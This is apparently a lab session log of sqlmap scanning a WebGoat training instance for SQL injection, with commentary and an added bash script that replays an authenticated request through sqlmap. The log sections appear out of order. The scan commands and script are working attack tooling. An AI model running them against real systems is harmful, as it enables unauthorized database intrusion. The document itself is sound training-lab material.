[02:34:41] [INFO] testing 'IBM DB2 stacked queries (heavy query - comment)'
[02:34:41] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query - comment)'
[02:34:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[02:34:42] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[02:34:42] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[02:34:42] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[02:34:42] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK)'
[02:34:42] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query)'
[02:34:42] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[02:34:42] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[02:34:42] [INFO] testing 'MySQL AND time-based blind (ELT)'
[02:34:43] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[02:34:43] [INFO] testing 'PostgreSQL AND time-based blind (heavy query)'
[02:34:43] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[02:34:43] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)'
[02:34:43] [INFO] testing 'Oracle AND time-based blind'
[02:34:43] [INFO] testing 'Oracle AND time-based blind (heavy query)'
[02:34:43] [INFO] testing 'IBM DB2 AND time-based blind (heavy query)'
[02:34:44] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query)'
[02:34:44] [INFO] testing 'Informix AND time-based blind (heavy query)'
[02:34:44] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[02:34:44] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[02:34:44] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[02:34:44] [INFO] testing 'PostgreSQL > 8.1 time-based blind - Parameter replace'
[02:34:44] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)'
[02:34:44] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)'
[02:34:44] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[02:34:44] [INFO] testing 'PostgreSQL > 8.1 time-based blind - ORDER BY, GROUP BY clause'
[02:34:44] [INFO] testing 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP)'
[02:34:44] [INFO] testing 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_PIPE.RECEIVE_MESSAGE)'
[02:34:44] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[02:34:44] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[02:34:45] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[02:34:45] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[02:34:45] [WARNING] parameter 'Referer' does not seem to be injectable
[02:34:45] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'

[*] ending @ 02:34:45 /2025-05-12/

┌──(kali㉿kali)-[~]
└─$ 
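Why the run above found nothing, and how to point sqlmap at the lesson instead. The log shows sqlmap following a 302 to /WebGoat/login and accepting a brand-new JSESSIONID from the server, so every payload went to the login page; the JSESSIONID obtained earlier was never passed with --cookie. Scanning the start.mvc URL has the same problem plus another one: the "#lesson/..." part is a URL fragment that the browser never sends, so sqlmap only ever sees the username parameter. The script below is an added example, not code from the original post or from WebGoat. It writes the authenticated request into a file for sqlmap -r, checks that the session is still alive (a dead session reproduces the 302 seen above) before spending any requests, and limits testing to the lesson parameter. Host, port and the start.mvc URL come from the post; the lesson path /WebGoat/SqlInjection/assignment5b, the body login_count=1&userid=1, the parameter userid and --dbms=HSQLDB are assumptions (WebGoat's numeric SQL injection lesson and its embedded HSQLDB) that must be confirmed in the browser's Network tab when the lesson form is submitted.

```shell
#!/usr/bin/env bash
# Added example, not code from the original post or from WebGoat: drive sqlmap
# through an authenticated WebGoat session using a raw request file (-r).
#
# Host/port and the start.mvc URL are from the post. LESSON_PATH, LESSON_BODY
# and INJECT_PARAM are ASSUMPTIONS (WebGoat's numeric SQL injection lesson);
# confirm them in the browser's Network tab when you submit the lesson form.
# JSESSIONID must come from your own logged-in browser session; the value from
# the post is long expired and only serves as a placeholder.
set -eu

WEBGOAT_HOST="192.168.128.145:8080"
JSESSIONID="${JSESSIONID:-F3FA864D5426EF90B70752EE642E65C4}"
LESSON_PATH="/WebGoat/SqlInjection/assignment5b"   # assumed, verify in browser
LESSON_BODY="login_count=1&userid=1"                # assumed, verify in browser
INJECT_PARAM="userid"                               # assumed, verify in browser
# --dbms=HSQLDB: WebGoat runs on an embedded HSQLDB, so sqlmap need not try the
# MySQL/Oracle/MSSQL payload families seen in the log; drop it if unsure.
SQLMAP_OPTS="--batch --level=3 --risk=2 --dbms=HSQLDB --dbs"

# write_request FILE PATH BODY
# Writes an HTTP/1.1 POST that sqlmap -r can replay, carrying the session
# cookie. There is deliberately no '#lesson/...' here: a URL fragment is never
# sent to the server, so scanning start.mvc?...#lesson/X only tests 'username'.
write_request() {
  local file="$1" path="$2" body="$3"
  cat > "$file" <<EOF
POST ${path} HTTP/1.1
Host: ${WEBGOAT_HOST}
Cookie: JSESSIONID=${JSESSIONID}
Content-Type: application/x-www-form-urlencoded

${body}
EOF
}

# sqlmap_cmd FILE PARAM
# Prints the invocation. -p restricts testing to the lesson parameter so that
# sqlmap does not spend requests on User-Agent and Referer as it did above.
sqlmap_cmd() {
  printf 'sqlmap -r %s -p %s %s\n' "$1" "$2" "$SQLMAP_OPTS"
}

# session_alive
# The log above shows what a missing or dead session looks like: a 302 to
# /WebGoat/login, after which every payload hits the login page. Probe the
# lesson frame with the cookie first; anything but 200 (or curl missing, or
# the host unreachable) returns non-zero so the caller stops instead of
# scanning the wrong page.
session_alive() {
  command -v curl >/dev/null 2>&1 || return 1
  local code
  code=$(curl -s -o /dev/null --max-time 5 -w '%{http_code}' \
           -b "JSESSIONID=${JSESSIONID}" \
           "http://${WEBGOAT_HOST}/WebGoat/start.mvc?username=user11") || return 1
  [ "$code" = "200" ]
}

main() {
  local req="${TMPDIR:-/tmp}/webgoat_sqli.req"
  write_request "$req" "$LESSON_PATH" "$LESSON_BODY"
  printf 'Request file %s:\n' "$req"; cat "$req"
  if ! session_alive; then
    echo "Session check failed (curl missing, host unreachable or JSESSIONID expired); refresh the cookie, then run:" >&2
    sqlmap_cmd "$req" "$INJECT_PARAM" >&2
    return 0
  fi
  if command -v sqlmap >/dev/null 2>&1; then
    # shellcheck disable=SC2086  # word splitting of SQLMAP_OPTS is intended
    sqlmap -r "$req" -p "$INJECT_PARAM" $SQLMAP_OPTS
  else
    echo "sqlmap not installed; run:" >&2
    sqlmap_cmd "$req" "$INJECT_PARAM" >&2
  fi
}
main
```

Run it as JSESSIONID=<your-session-id> ./sqlmap_webgoat.sh after logging in to WebGoat in a browser and copying the cookie from the developer tools. Without a valid session it only writes the request file and prints the command, which is the behaviour you want: a scan that starts from a 302 to /WebGoat/login, as the one above did, produces a long list of "does not appear to be injectable" lines no matter how high --level and --risk are set.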


sqlmap -u "http://192.168.128.145:8080/WebGoat/start.mvc?username=user11#lesson/SqlInjectionAdvanced.lesson" --batch --level=3 --risk=2 --dbs

┌──(kali㉿kali)-[~]
└─$ sqlmap -u "http://192.168.128.145:8080/WebGoat/start.mvc?username=user11#lesson/SqlInjectionAdvanced.lesson" --batch --level=3 --risk=2 --dbs
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.9.2#stable}
|_ -| . [(]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:32:33 /2025-05-12/

[02:32:33] [INFO] testing connection to the target URL
got a 302 redirect to 'http://192.168.128.145:8080/WebGoat/login'. Do you want to follow? [Y/n] Y
you have not declared cookie(s), while server wants to set its own ('JSESSIONID=28CB8E82380...D2145FEA67'). Do you want to use those [Y/n] Y
[02:32:33] [INFO] checking if the target is protected by some kind of WAF/IPS
[02:32:33] [INFO] testing if the target URL content is stable
[02:32:33] [WARNING] GET parameter 'username' does not appear to be dynamic
[02:32:33] [WARNING] heuristic (basic) test shows that GET parameter 'username' might not be injectable
[02:32:33] [INFO] testing for SQL injection on GET parameter 'username'
[02:32:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:32:34] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[02:32:34] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[02:32:34] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[02:32:34] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'
[02:32:34] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[02:32:34] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[02:32:35] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[02:32:35] [INFO] testing 'Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[02:32:35] [INFO] testing 'SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)'
[02:32:35] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[02:32:35] [INFO] testing 'PostgreSQL boolean-based blind - Parameter replace'
[02:32:35] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace'
[02:32:35] [INFO] testing 'Oracle boolean-based blind - Parameter replace'
[02:32:35] [INFO] testing 'Informix boolean-based blind - Parameter replace'
[02:32:35] [INFO] testing 'Microsoft Access boolean-based blind - Parameter replace'
[02:32:35] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[02:32:35] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)'
[02:32:35] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[02:32:35] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)'
[02:32:35] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[02:32:35] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[02:32:35] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[02:32:35] [INFO] testing 'PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause'
[02:32:35] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause'
[02:32:35] [INFO] testing 'Oracle boolean-based blind - ORDER BY, GROUP BY clause'
[02:32:35] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause'
[02:32:36] [INFO] testing 'PostgreSQL boolean-based blind - Stacked queries'
[02:32:36] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)'
[02:32:36] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:32:36] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[02:32:36] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[02:32:37] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:32:37] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[02:32:37] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[02:32:37] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)'
[02:32:37] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)'
[02:32:38] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[02:32:38] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[02:32:38] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[02:32:38] [INFO] testing 'Firebird AND error-based - WHERE or HAVING clause'
[02:32:38] [INFO] testing 'MonetDB AND error-based - WHERE or HAVING clause'
[02:32:39] [INFO] testing 'Vertica AND error-based - WHERE or HAVING clause'
[02:32:39] [INFO] testing 'IBM DB2 AND error-based - WHERE or HAVING clause'
[02:32:39] [INFO] testing 'ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[02:32:39] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[02:32:39] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[02:32:39] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[02:32:39] [INFO] testing 'PostgreSQL error-based - Parameter replace'
[02:32:39] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
[02:32:39] [INFO] testing 'Oracle error-based - Parameter replace'
[02:32:39] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[02:32:39] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[02:32:39] [INFO] testing 'PostgreSQL error-based - ORDER BY, GROUP BY clause'
[02:32:39] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Stacking (EXEC)'
[02:32:39] [INFO] testing 'Generic inline queries'
[02:32:39] [INFO] testing 'MySQL inline queries'
[02:32:39] [INFO] testing 'PostgreSQL inline queries'
[02:32:39] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[02:32:39] [INFO] testing 'Oracle inline queries'
[02:32:39] [INFO] testing 'SQLite inline queries'
[02:32:39] [INFO] testing 'Firebird inline queries'
[02:32:39] [INFO] testing 'ClickHouse inline queries'
[02:32:39] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[02:32:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[02:32:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[02:32:40] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[02:32:40] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[02:32:40] [INFO] testing 'PostgreSQL stacked queries (heavy query - comment)'
[02:32:40] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc - comment)'
[02:32:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[02:32:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (DECLARE - comment)'
[02:32:40] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[02:32:41] [INFO] testing 'Oracle stacked queries (heavy query - comment)'
[02:32:41] [INFO] testing 'IBM DB2 stacked queries (heavy query - comment)'
[02:32:41] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query - comment)'
[02:32:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[02:32:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[02:32:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[02:32:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[02:32:41] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK)'
[02:32:42] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query)'
[02:32:42] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[02:32:42] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[02:32:42] [INFO] testing 'MySQL AND time-based blind (ELT)'
[02:32:42] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[02:32:42] [INFO] testing 'PostgreSQL AND time-based blind (heavy query)'
[02:32:42] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[02:32:43] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)'
[02:32:43] [INFO] testing 'Oracle AND time-based blind'
[02:32:43] [INFO] testing 'Oracle AND time-based blind (heavy query)'
[02:32:43] [INFO] testing 'IBM DB2 AND time-based blind (heavy query)'
[02:32:43] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query)'
[02:32:43] [INFO] testing 'Informix AND time-based blind (heavy query)'
[02:32:44] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[02:32:44] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[02:32:44] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[02:32:44] [INFO] testing 'PostgreSQL > 8.1 time-based blind - Parameter replace'
[02:32:44] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)'
[02:32:44] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)'
[02:32:44] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[02:32:44] [INFO] testing 'PostgreSQL > 8.1 time-based blind - ORDER BY, GROUP BY clause'
[02:32:44] [INFO] testing 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP)'
[02:32:44] [INFO] testing 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_PIPE.RECEIVE_MESSAGE)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[02:32:44] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[02:32:44] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[02:32:44] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[02:32:45] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[02:32:45] [WARNING] GET parameter 'username' does not seem to be injectable
[02:32:45] [WARNING] parameter 'User-Agent' does not appear to be dynamic
[02:32:45] [WARNING] heuristic (basic) test shows that parameter 'User-Agent' might not be injectable
[02:32:45] [INFO] testing for SQL injection on parameter 'User-Agent'
[02:32:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:32:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[02:32:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[02:32:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[02:32:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'
[02:32:46] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[02:32:46] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[02:32:46] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[02:32:46] [INFO] testing 'Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[02:32:46] [INFO] testing 'SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)'
[02:32:47] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[02:32:47] [INFO] testing 'PostgreSQL boolean-based blind - Parameter replace'
[02:32:47] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace'
[02:32:47] [INFO] testing 'Oracle boolean-based blind - Parameter replace'
[02:32:47] [INFO] testing 'Informix boolean-based blind - Parameter replace'
[02:32:47] [INFO] testing 'Microsoft Access boolean-based blind - Parameter replace'
[02:32:47] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[02:32:47] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)'
[02:32:47] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[02:32:47] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)'
[02:32:47] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[02:32:47] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[02:32:47] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[02:32:47] [INFO] testing 'PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause'
[02:32:47] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause'
[02:32:47] [INFO] testing 'Oracle boolean-based blind - ORDER BY, GROUP BY clause'
[02:32:47] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause'
[02:32:47] [INFO] testing 'PostgreSQL boolean-based blind - Stacked queries'
[02:32:47] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)'
[02:32:47] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:32:47] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[02:32:48] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[02:32:48] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:32:48] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[02:32:48] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[02:32:48] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)'
[02:32:48] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)'
[02:32:49] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[02:32:49] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[02:32:49] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[02:32:49] [INFO] testing 'Firebird AND error-based - WHERE or HAVING clause'
[02:32:49] [INFO] testing 'MonetDB AND error-based - WHERE or HAVING clause'
[02:32:49] [INFO] testing 'Vertica AND error-based - WHERE or HAVING clause'
[02:32:49] [INFO] testing 'IBM DB2 AND error-based - WHERE or HAVING clause'
[02:32:50] [INFO] testing 'ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[02:32:50] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[02:32:50] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[02:32:50] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[02:32:50] [INFO] testing 'PostgreSQL error-based - Parameter replace'
[02:32:50] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
[02:32:50] [INFO] testing 'Oracle error-based - Parameter replace'
[02:32:50] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[02:32:50] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[02:32:50] [INFO] testing 'PostgreSQL error-based - ORDER BY, GROUP BY clause'
[02:32:50] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Stacking (EXEC)'
[02:32:50] [INFO] testing 'Generic inline queries'
[02:32:50] [INFO] testing 'MySQL inline queries'
[02:32:50] [INFO] testing 'PostgreSQL inline queries'
[02:32:50] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[02:32:50] [INFO] testing 'Oracle inline queries'
[02:32:50] [INFO] testing 'SQLite inline queries'
[02:32:50] [INFO] testing 'Firebird inline queries'
[02:32:50] [INFO] testing 'ClickHouse inline queries'
[02:32:50] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[02:32:50] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[02:32:50] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[02:32:50] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[02:32:51] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[02:32:51] [INFO] testing 'PostgreSQL stacked queries (heavy query - comment)'
[02:32:51] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc - comment)'
[02:32:51] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[02:32:51] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (DECLARE - comment)'
[02:32:51] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[02:32:51] [INFO] testing 'Oracle stacked queries (heavy query - comment)'
[02:32:51] [INFO] testing 'IBM DB2 stacked queries (heavy query - comment)'
[02:32:51] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query - comment)'
[02:32:51] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[02:32:51] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[02:32:52] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[02:32:52] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[02:32:52] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK)'
[02:32:52] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query)'
[02:32:52] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[02:32:52] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[02:32:52] [INFO] testing 'MySQL AND time-based blind (ELT)'
[02:32:53] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[02:32:53] [INFO] testing 'PostgreSQL AND time-based blind (heavy query)'
[02:32:53] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[02:32:53] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)'
[02:32:53] [INFO] testing 'Oracle AND time-based blind'
[02:32:53] [INFO] testing 'Oracle AND time-based blind (heavy query)'
[02:32:53] [INFO] testing 'IBM DB2 AND time-based blind (heavy query)'
[02:32:53] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query)'
[02:32:54] [INFO] testing 'Informix AND time-based blind (heavy query)'
[02:32:54] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[02:32:54] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[02:32:54] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[02:32:54] [INFO] testing 'PostgreSQL > 8.1 time-based blind - Parameter replace'
[02:32:54] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)'
[02:32:54] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)'
[02:32:54] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[02:32:54] [INFO] testing 'PostgreSQL > 8.1 time-based blind - ORDER BY, GROUP BY clause'
[02:32:54] [INFO] testing 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP)'
[02:32:54] [INFO] testing 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_PIPE.RECEIVE_MESSAGE)'
[02:32:54] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[02:32:54] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[02:32:55] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[02:32:55] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[02:32:55] [WARNING] parameter 'User-Agent' does not seem to be injectable
[02:32:55] [WARNING] parameter 'Referer' does not appear to be dynamic
[02:32:55] [WARNING] heuristic (basic) test shows that parameter 'Referer' might not be injectable
[02:32:55] [INFO] testing for SQL injection on parameter 'Referer'
[02:32:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:32:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[02:32:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[02:32:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[02:32:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'
[02:32:56] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[02:32:56] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
